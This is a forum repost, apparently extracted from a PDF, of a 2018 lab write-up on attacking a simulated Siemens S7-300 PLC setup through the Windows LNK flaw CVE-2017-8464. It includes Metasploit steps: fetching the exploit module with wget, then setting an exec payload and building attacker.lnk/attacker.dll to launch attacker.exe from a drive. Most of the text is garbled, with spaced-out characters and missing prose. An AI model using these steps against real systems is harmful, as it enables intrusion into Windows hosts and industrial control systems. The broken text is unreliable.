[12429] 2018-03-05_通过“震网三代”和SiemensPLC0day漏洞,实现对工控系统的入侵实验

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-18
2018-03-05_通过“震网三代”和SiemensPLC0day漏洞,实现对工控系统的入侵实验 S i e m e n s   P L C   0 d a y L i u k e r T e a m   F r e e B u f   2 0 1 8 - 0 3 - 0 5 * L i u k e r T e a m F r e e B u f O S K a l i   L i n u x   2 0 1 7 . 3 O S W i n d o w s   7   s p 1   x 6 4 I P 1 9 2 . 1 6 8 . 0 . 1 5 2 仿 仿 仿 仿 P L C S i e m e n s   S 7 - 3 0 0 I P 1 9 2 . 1 6 8 . 0 . 2 3 4 W i n d o w s C V E - 2 0 1 7 - 8 4 6 4
P L C 0   d a y 0 x 0 0   2 0 0 6 U 2 0 1 0 S t u x n e t 2   2 0 1 1 ~ D Q   D u q u 2 0 1 7 6 1 4 W i n d o w s C V E - 2 0 1 7 - 8 4 6 4   西 0   d a y 仿 西 0   d a y p o c * * 西 0   d a y p o c e x e e x p l o i t * * C V E - 2 0 1 7 - 8 4 6 4 e x e U
3   U 0 x 0 1   1   C V E - 2 0 1 7 - 8 4 6 4 2 0 1 7 6 1 4 C V E - 2 0 1 7 - 8 4 6 4 W i n d o w s U   访 使 U   C V E - 2 0 1 7 - 8 4 6 4 U 2 0 1 0 使 穿 C V E - 2 0 1 0 - 2 5 6 8 w w w . f r e e b u f . c o m / n e w s / 1 4 3 3 5 3 . h t m l W i n d o w s   7 W i n d o w s   8 . 1 W i n d o w s   R T   8 . 1 W i n d o w s   1 0 W i n d o w s   S e r v e r   2 0 0 8
W i n d o w s   S e r v e r   2 0 0 8   R 2 W i n d o w s   S e r v e r   2 0 1 2 W i n d o w s   S e r v e r   2 0 1 2   R 2 W i n d o w s   S e r v e r   2 0 1 6 2   西 西 P L C   0   d a y 0   d a y 使 V S 2 0 0 8 a t t a c k e r . e x e P L C   4   a t t a c k e r . e x e i n i t . t x t a t t a c k e r . e x e 使 0 x 0 2   U C V E - 2 0 1 7 - 8 4 6 4 m s f h t t p s : / / g i t h u b . c o m / r a p i d 7 / m e t a s p l o i t - f r a m e w o r k / p u l l / 8 7 6 7 P y t h o n h t t p s : / / g i t h u b . c o m / n i x a w k / l a b s / b l o b / m a s t e r / C V E - 2 0 1 7 - 8 4 6 4 / e x p l o i t _ C V E - 2 0 1 7 - 8 4 6 4 . p y m s f e x p U m s f e x p m s f W i n d o w s   x 6 4 p a y l o a d 6 4 e x e c P C U E 5 $   c d   / u s r / s h a r e / m e t a s p l o i t - f r a m e w o r k / m o d u l e s / e x p l o i t s / w i n d o w s / f i l e f o r m a t / $   l s   - a l   |   g r e p   c v e _ 2 0 1 7 _ 8 4 6 4 _ l n k _ r c e . r b #   $   w g e t   h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / y k o s t e r / m e t a s p l o i t - f r a m e w o r k / m a s t e r / m o d u l e s / e x p l o i t s / w i n d o w s / f i l e f o r m a t / c v e _ 2 0 1 7 _ 8 4 6 4 _ l n k _ r c e . r b >   u s e   e x p l o i t s / w i n d o w s / f i l e f o r m a t / c v e _ 2 0 1 7 _ 8 4 6 4 _ l n k _ r c e >   s e t   p a y l o a d   w i n d o w s / x 6 4 / e x e c >   s e t   d l l n a m e   a t t a c k e r . d l l >   s e t   f i l e n a m e   a t t a c k e r . l n k >   s e t   c m d   e : a t t a c k e r . e x e >   s e t   E X I T F U N C   t h r e a d   >   e x p l o i t
5   2 4 6 6   e x p l o i t / r o o t / . m s f 4 / l o c a l /
7   U 2 3 O k U ~ 0 x 0 3   ~ ~ ~ U P C 8 d - z s e t   c m d   d : a t t a c k e r . e x e s e t   c m d   z : a t t a c k e r . e x e
8   U U 8 P C U U 访 u 访 9
9   访 ( G I F ) 1 0 1 1 1 0   1 1   N i c e ~ 0 x 0 4   仿 使 W i n d o w s   L n k C V E - 2 0 1 7 - 8 4 6 4 S i e m e n s   P L C 0 d a y   C V E - 2 0 1 7 - 8 4 6 4 W i n d o w s   L n k C V E - 2 0 1 7 - 8 4 6 4 h t t p s : / / p o r t a l . m s r c . m i c r o s o f t . c o m / e n - u s / s e c u r i t y - g u i d a n c e / a d v i s o r y / C V E - 2 0 1 7 - 8 4 6 4 U W e b c l i e n t   S e r v i c e   0 x 0 5   C V E - 2 0 1 7 - 8 4 6 4 C V E - 2 0 1 7 - 8 4 6 4   -   F r e e B u f   |   C V E - 2 0 1 7 - 8 4 6 4   -   F r e e B u f   |  
W i n d o w s   L n k ( C V E - 2 0 1 7 - 8 4 6 4 )   -     R o a r T a l k     , , 4 h o u . c o m * L i u k e r T e a m F r e e B u f
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则